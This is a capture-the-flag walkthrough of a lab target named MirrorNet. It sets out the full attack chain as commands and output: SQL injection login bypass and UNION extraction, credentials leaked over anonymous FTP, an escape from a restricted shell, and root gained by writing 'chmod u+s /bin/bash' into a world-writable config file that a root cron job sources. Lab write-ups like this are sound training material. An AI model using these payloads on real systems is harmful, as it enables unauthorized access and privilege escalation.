Walkthrough: MirrorNet

Challenge Description:
A multi-service Linux target exposes a vulnerable Flask portal, anonymous FTP access, an exposed Redis instance, and a restricted SSH shell. Abuse SQL injection, enumerate internal services, escape a restricted shell, and exploit a world-writable cron-sourced configuration file to gain root access.

---

1. Enumeration

Initial scanning reveals multiple exposed services:

• 30576/tcp → SSH
• 30577/tcp → Flask/Werkzeug application
• 30578/tcp → Nginx document viewer
• 30579/tcp → FTP
• 30580/tcp → Redis

Port Scan

nmap -sV -p 30576,30577,30578,30579,30580 23.92.29.178

Results

30576/tcp open  ssh     OpenSSH 8.9p1 Ubuntu
30577/tcp open  http    Werkzeug httpd 3.1.8
30578/tcp open  http    nginx 1.18.0
30579/tcp open  ftp     vsftpd 2.0.8 or later
30580/tcp open  redis   Redis key-value store

---

2. Exploiting the Flask Login

Browsing the Flask application redirects to /login.

Request

curl -i http://23.92.29.178:30577/

The login form is vulnerable to SQL injection.

SQL Injection Login Bypass

curl -i -X POST http://23.92.29.178:30577/login \
-d "username=' OR 1=1-- -&password=test"

Result

HTTP/1.1 302 FOUND
Location: /dashboard
Set-Cookie: session=...

The injection successfully authenticates as admin.

---

3. Exploiting SQL Injection in Search

The /search endpoint is also vulnerable.

Request

curl -s \
"http://23.92.29.178:30577/search?q=%27%20OR%201%3D1--%20-" \
-b "session=COOKIE"

Result

admin
guest
elara
root
gitadmin

Interesting notes appear:

Analyst account. Shadow backup:
$6$mirrornet2026$AAAAAAAAAAAAAAAAAAAAAAAAAAAA

Guest access only — restricted shell on SSH

---

4. Enumerating the SQLite Database

The application uses SQLite.

Version Enumeration

curl -s \
"http://23.92.29.178:30577/search?q=%27%20UNION%20SELECT%201,sqlite_version(),3--%20-" \
-b "session=COOKIE"

Result

3.37.2

---

Enumerating Tables

curl -s \
"http://23.92.29.178:30577/search?q=%27%20UNION%20SELECT%201,sql,3%20FROM%20sqlite_master%20WHERE%20name=%27flags%27--%20-" \
-b "session=COOKIE"

Result

CREATE TABLE flags (
    id INTEGER PRIMARY KEY,
    flag TEXT
)

---

Reading the Fake Flag

curl -s \
"http://23.92.29.178:30577/search?q=%27%20UNION%20SELECT%201,flag,3%20FROM%20flags--%20-" \
-b "session=COOKIE"

Result

NOTAFLAG{sql_too_easy_keep_digging}

The challenge intentionally provides a decoy flag.

---

5. Anonymous FTP Access

Anonymous FTP login is enabled.

FTP Login

ftp 23.92.29.178 30579

Directory Listing

backup_notes.txt
employees.csv
fake_flag.txt

---

Interesting FTP Note

Previous credentials (M1rr0rAdm!n) are still valid for portal and guest SSH access.

This reveals valid SSH credentials for the guest account.

---

6. SSH Access as Guest

SSH Login

ssh guest@23.92.29.178 -p 30576

Password

M1rr0rAdm!n

After login, the shell is heavily restricted (rbash).

---

7. Enumerating the Restricted Shell

Interesting notes are present:

TODO list:
  - Check /opt/dev/credentials.txt
  - mirrorpeek binary in /usr/local/bin looks odd

A SUID binary exists:

ls -l /usr/local/bin/mirrorpeek

Result

-rwsr-xr-x 1 root root 16408 /usr/local/bin/mirrorpeek

Running it only reveals fake information:

Vault key: FAKE{suid_aint_the_path_here_rookie}

---

8. Escaping rbash

The restricted shell exports:

export PATH=/home/guest/bin
readonly PATH

The writable ~/bin directory allows execution of custom scripts.

Create a Shell Wrapper

printf '#!/bin/bash\n/bin/bash\n' | tee bin/sh
chmod +x bin/sh

Execute

sh

Result

bash-5.1$

The restricted shell is bypassed.

---

9. Enumerating Sensitive Files

With a normal shell, enumerate /opt.

Enumeration

find /opt -maxdepth 3 -type f 2>/dev/null

Interesting Files

/opt/dev/credentials.txt
/opt/mirrornet/scripts/health_check.sh
/opt/mirrornet/config/env.conf

The credentials file is another decoy.

---

10. Discovering the Privilege Escalation

Health Check Script

cat /opt/mirrornet/scripts/health_check.sh

Result

#!/bin/bash
source /opt/mirrornet/config/env.conf

mkdir -p "$LOG_DIR"
echo "health_check OK" >> "$LOG_DIR/health.log"

The script sources a configuration file as root.

---

Checking Permissions

ls -l /opt/mirrornet/config/env.conf

Result

-rw-rw-rw- 1 root root 97 env.conf

The configuration file is:

• root-owned
• world writable
• sourced by a root cron job

---

11. Root Cron Job

Cron Entry

cat /etc/cron.d/mirrornet

Result

* * * * * root /opt/mirrornet/scripts/health_check.sh

Every minute, root executes the vulnerable script.

---

12. Privilege Escalation to Root

Overwrite the sourced configuration file with a malicious payload.

Payload

printf 'chmod u+s /bin/bash\n' > /opt/mirrornet/config/env.conf

Wait for cron execution.

Then execute:

/bin/bash -p

Result

uid=1002(guest) gid=1002(guest) euid=0(root)

Root shell obtained.

---

13. Capturing Flags

User Flag

cat /home/elara/user.txt

Result

flag{3l4ra_s33s_4ll_r3fl3ct10ns}

---

Root Flag

cat /root/root.txt

Result

flag{m1rr0rn3t_c0mpl3t3ly_sh4tt3r3d}

---

Key Takeaways

1. SQL Injection Still Leads to Full Compromise
   Unsanitized SQL queries exposed:

   • Authentication bypass
   • Database enumeration
   • Internal application details

2. Anonymous FTP Frequently Leaks Sensitive Information
   Backup notes disclosed valid SSH credentials.

3. Restricted Shells Are Not Security Boundaries
   Writable directories in PATH allowed escaping rbash.

4. World-Writable Config Files Are Dangerous
   Sourcing attacker-controlled files as root results in immediate privilege escalation.

5. Cron Jobs Must Never Trust Writable Files
   The root cron job executed a script that sourced a globally writable configuration file.

6. SUID Binaries Can Distract from the Real Attack Path
   The mirrorpeek binary was a deliberate rabbit hole while the actual escalation vector was cron misconfiguration.